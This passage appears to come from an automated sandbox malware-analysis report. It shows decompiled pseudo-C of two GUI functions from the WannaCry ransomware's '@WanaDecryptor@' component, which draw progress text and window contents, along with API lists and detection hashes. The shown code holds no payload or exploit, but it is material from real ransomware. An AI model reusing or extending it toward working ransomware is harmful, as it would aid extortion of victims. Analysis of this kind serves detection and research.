				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

































                                                      0x004090f6
                                                      0x004090f8
                                                      0x004090fd
                                                      0x004090fe
                                                      0x00409105
                                                      0x0040910c
                                                      0x00409115
                                                      0x0040911c
                                                      0x0040911e
                                                      0x0040971e
                                                      0x00409729
                                                      0x00409736
                                                      0x00409736
                                                      0x00409124
                                                      0x0040912f
                                                      0x00409133
                                                      0x00409137
                                                      0x00409142
                                                      0x00409143
                                                      0x0040914a
                                                      0x00409152
                                                      0x0040915c
                                                      0x0040918c
                                                      0x0040918e
                                                      0x00409197
                                                      0x00409197
                                                      0x0040919c
                                                      0x004091a7
                                                      0x004091ad
                                                      0x004091b1
                                                      0x004091bb
                                                      0x004091bf
                                                      0x004091c4
                                                      0x0040915e
                                                      0x00409163
                                                      0x0040916c
                                                      0x0040916e
                                                      0x00409177
                                                      0x00409177
                                                      0x0040917f
                                                      0x0040917f
                                                      0x00409163
                                                      0x004091c8
                                                      0x004091cf
                                                      0x0040970a
                                                      0x0040970e
                                                      0x00409719
                                                      0x00000000
                                                      0x004091d5
                                                      0x004091dd
                                                      0x004091e4
                                                      0x004091e9
                                                      0x004091eb
                                                      0x004091ef
                                                      0x004091fb
                                                      0x00409203
                                                      0x00409208
                                                      0x00409215
                                                      0x0040921d
                                                      0x00409225
                                                      0x0040922d
                                                      0x00409235
                                                      0x0040923e
                                                      0x00409246
                                                      0x0040924e
                                                      0x00409256
                                                      0x00409259
                                                      0x00409260
                                                      0x00409264
                                                      0x0040926b
                                                      0x0040926f
                                                      0x00409277
                                                      0x00409282
                                                      0x0040928d
                                                      0x00409292
                                                      0x00409296
                                                      0x0040929d
                                                      0x004092a1
                                                      0x004092a5
                                                      0x004092ad
                                                      0x004092b8
                                                      0x004092c0
                                                      0x004092c5
                                                      0x004092c9
                                                      0x004092d9
                                                      0x004092e1
                                                      0x004092f3
                                                      0x004092f7
                                                      0x004092fb
                                                      0x00409308
                                                      0x0040930d
                                                      0x0040930e
                                                      0x0040930f
                                                      0x00409317
                                                      0x0040931c
                                                      0x0040931f
                                                      0x00409323
                                                      0x00409327
                                                      0x00409337
                                                      0x00409355
                                                      0x00409357
                                                      0x00409357
                                                      0x0040935b
                                                      0x0040935f
                                                      0x00409363
                                                      0x0040936f
                                                      0x0040937b
                                                      0x00409381
                                                      0x00409389
                                                      0x004093a4
                                                      0x004093bd
                                                      0x004093de
                                                      0x00000000
                                                      0x00000000
                                                      0x004093e0
                                                      0x004093e8
                                                      0x004093ec
                                                      0x004093f0
                                                      0x004093f2
                                                      0x004093f2
                                                      0x00000000
                                                      0x004093f2
                                                      0x004093bf
                                                      0x004093c7
                                                      0x004093cb
                                                      0x004093cf
                                                      0x004093d3
                                                      0x00000000
                                                      0x004093d3
                                                      0x004093a6
                                                      0x004093ae
                                                      0x004093b2
                                                      0x00000000
                                                      0x0040938b
                                                      0x0040938f
                                                      0x00409393
                                                      0x00409397
                                                      0x0040939b
                                                      0x004093f6
                                                      0x004093ff
                                                      0x0040940b
                                                      0x004094b9
                                                      0x004094cc
                                                      0x004094d5
                                                      0x004094e8
                                                      0x004094f3
                                                      0x00409517
                                                      0x00409525
                                                      0x00409537
                                                      0x00409537
                                                      0x0040953d
                                                      0x00409553
                                                      0x0040955d
                                                      0x00409568
                                                      0x0040956a
                                                      0x0040956a
                                                      0x0040956e
                                                      0x00409572
                                                      0x00409579
                                                      0x00409580
                                                      0x0040958e
                                                      0x0040959b
                                                      0x004095ad
                                                      0x004095ad
                                                      0x004095bf
                                                      0x0040961a
                                                      0x0040962d
                                                      0x00409634
                                                      0x0040963c
                                                      0x00409641
                                                      0x00409649
                                                      0x0040964d
                                                      0x00409658
                                                      0x0040965a
                                                      0x0040965d
                                                      0x0040965d
                                                      0x00409662
                                                      0x0040966d
                                                      0x00409671
                                                      0x0040967b
                                                      0x0040967d
                                                      0x00409680
                                                      0x00409680
                                                      0x00409685
                                                      0x0040968d
                                                      0x00409691
                                                      0x0040969c
                                                      0x004096a3
                                                      0x004096a3
                                                      0x004096a6
                                                      0x004096ae
                                                      0x004096b2
                                                      0x004096bc
                                                      0x004096c5
                                                      0x004096c5
                                                      0x004096cc
                                                      0x004096d4
                                                      0x004096d9
                                                      0x004096dd
                                                      0x004096e5
                                                      0x004096ed
                                                      0x004096f5
                                                      0x004096fa
                                                      0x00409702
                                                      0x00000000
                                                      0x004095c1
                                                      0x004095c9
                                                      0x004095d1
                                                      0x004095d3
                                                      0x004095d3
                                                      0x004095e0
                                                      0x004095eb
                                                      0x004095ef
                                                      0x004095fc
                                                      0x00409604
                                                      0x00409608
                                                      0x0040960a
                                                      0x0040960b
                                                      0x0040960c
                                                      0x00409610
                                                      0x00409614
                                                      0x00000000
                                                      0x00409614
                                                      0x004095bf
                                                      0x0040950c
                                                      0x00000000
                                                      0x0040950c
                                                      0x00409421
                                                      0x0040942c
                                                      0x00409430
                                                      0x00409432
                                                      0x00409432
                                                      0x00409444
                                                      0x00000000
                                                      0x0040944a
                                                      0x0040945c
                                                      0x0040945f
                                                      0x00409467
                                                      0x00409478
                                                      0x0040948e
                                                      0x00409491
                                                      0x0040949b
                                                      0x0040949c
                                                      0x004094a3
                                                      0x00000000
                                                      0x004094a3
                                                      0x00409444
                                                      0x00409389

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                                      • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                                      • API String ID: 2923375784-3599407550
                                                      • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                                      • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

















































                                                      0x00405236
                                                      0x00405238
                                                      0x0040523d
                                                      0x0040523e
                                                      0x0040524b
                                                      0x0040524e
                                                      0x00405254
                                                      0x00405369
                                                      0x00405552
                                                      0x0040555a
                                                      0x00405560
                                                      0x00405568
                                                      0x00405572
                                                      0x00405572
                                                      0x0040536f
                                                      0x00405373
                                                      0x0040539e
                                                      0x0040539e
                                                      0x004053a1
                                                      0x004053a4
                                                      0x00405430
                                                      0x00405433
                                                      0x004054b4
                                                      0x004054b6
                                                      0x00405503
                                                      0x00405506
                                                      0x00000000
                                                      0x00000000
                                                      0x0040550b
                                                      0x0040550e
                                                      0x00405511
                                                      0x00405516
                                                      0x00405517
                                                      0x00405519
                                                      0x0040551b
                                                      0x00000000
                                                      0x00000000
                                                      0x0040551d
                                                      0x0040551f
                                                      0x00000000
                                                      0x00000000
                                                      0x00405521
                                                      0x00405523
                                                      0x00405525
                                                      0x00000000
                                                      0x00000000
                                                      0x00405527
                                                      0x00405529
                                                      0x00405534
                                                      0x00405535
                                                      0x00405536
                                                      0x0040553e
                                                      0x00405542
                                                      0x00405545
                                                      0x0040554a
                                                      0x0040554d
                                                      0x0040554f
                                                      0x0040554f
                                                      0x0040554f
                                                      0x00000000
                                                      0x00405529
                                                      0x004054bb
                                                      0x004054be
                                                      0x004054c1
                                                      0x004054c6
                                                      0x004054c7
                                                      0x004054c9
                                                      0x004054cb
                                                      0x004054d1
                                                      0x004054d1
                                                      0x004054d6
                                                      0x004054d6
                                                      0x004054d8
                                                      0x004054da
                                                      0x00000000
                                                      0x00000000
                                                      0x004054dc
                                                      0x004054de
                                                      0x004054e6
                                                      0x004054e7
                                                      0x004054ea
                                                      0x004054ef
                                                      0x004054f1
                                                      0x004054f4
                                                      0x004054f9
                                                      0x004054fc
                                                      0x004054fe
                                                      0x004054fe
                                                      0x004054fe
                                                      0x00000000
                                                      0x00405501
                                                      0x004054cd
                                                      0x004054cf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004054cf
                                                      0x0040543b
                                                      0x0040543f
                                                      0x00405440
                                                      0x00405443
                                                      0x0040544f
                                                      0x00405450
                                                      0x00405453
                                                      0x0040545b
                                                      0x00405468
                                                      0x0040546b
                                                      0x0040546c
                                                      0x0040546d
                                                      0x00405471
                                                      0x00405476
                                                      0x00405479
                                                      0x0040547e
                                                      0x00405487
                                                      0x0040548b
                                                      0x00405494
                                                      0x00405499
                                                      0x004054a2
                                                      0x004054aa
                                                      0x00000000
                                                      0x004054aa
                                                      0x004053b4
                                                      0x004053b5
                                                      0x004053b8
                                                      0x004053c3
                                                      0x004053d1
                                                      0x004053d5
                                                      0x004053d6
                                                      0x004053d7
                                                      0x004053dc
                                                      0x004053dd
                                                      0x004053e7
                                                      0x004053e8
                                                      0x004053e9
                                                      0x004053ed
                                                      0x004053f2
                                                      0x004053f5
                                                      0x004053fa
                                                      0x00405403
                                                      0x00405407
                                                      0x00405410
                                                      0x00405415
                                                      0x0040541e
                                                      0x00405426
                                                      0x00000000
                                                      0x00405426
                                                      0x0040537b
                                                      0x00405381
                                                      0x00405384
                                                      0x00405386
                                                      0x00000000
                                                      0x00000000
                                                      0x00405388
                                                      0x0040538a
                                                      0x0040538c
                                                      0x00000000
                                                      0x00000000
                                                      0x0040538e
                                                      0x00405390
                                                      0x00405393
                                                      0x00405396
                                                      0x0040539b
                                                      0x0040539b
                                                      0x0040539b
                                                      0x00000000
                                                      0x00405390
                                                      0x0040525d
                                                      0x00405285
                                                      0x00405288
                                                      0x0040528d
                                                      0x004052f9
                                                      0x004052fa
                                                      0x004052fb
                                                      0x004052fc
                                                      0x00405303
                                                      0x00405307
                                                      0x00405309
                                                      0x0040530c
                                                      0x00405314
                                                      0x00405319
                                                      0x00405320
                                                      0x00405321
                                                      0x00405322
                                                      0x00405326
                                                      0x0040532b
                                                      0x0040532e
                                                      0x00405333
                                                      0x0040533c
                                                      0x00405340
                                                      0x00405349
                                                      0x0040534e
                                                      0x00405357
                                                      0x0040535f
                                                      0x0040528f
                                                      0x00405295
                                                      0x00405297
                                                      0x00405298
                                                      0x0040529c
                                                      0x004052a0
                                                      0x004052a9
                                                      0x004052b1
                                                      0x004052b2
                                                      0x004052b3
                                                      0x004052b7
                                                      0x004052b8
                                                      0x004052bd
                                                      0x004052c0
                                                      0x004052c5
                                                      0x004052ce
                                                      0x004052d3
                                                      0x004052dc
                                                      0x004052e4
                                                      0x004052e4
                                                      0x00000000
                                                      0x0040528d
                                                      0x00405265
                                                      0x00405268
                                                      0x0040526d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040526f
                                                      0x00405273
                                                      0x00000000
                                                      0x00000000
                                                      0x00405275
                                                      0x00405277
                                                      0x0040527a
                                                      0x0040527d
                                                      0x00405282
                                                      0x00405282
                                                      0x00000000

                                                      APIs
                                                      • #940.MFC42(?), ref: 0040527D
                                                      • #4277.MFC42(?,00000001), ref: 004052A0
                                                      • #923.MFC42(?,00000000,?), ref: 004052B8
                                                      • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                                      • #4129.MFC42(?,?), ref: 004052FC
                                                      • #5710.MFC42 ref: 00405314
                                                      • #922.MFC42(?,00000000,00000000), ref: 00405326
                                                      • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                                      • #940.MFC42(?), ref: 00405396
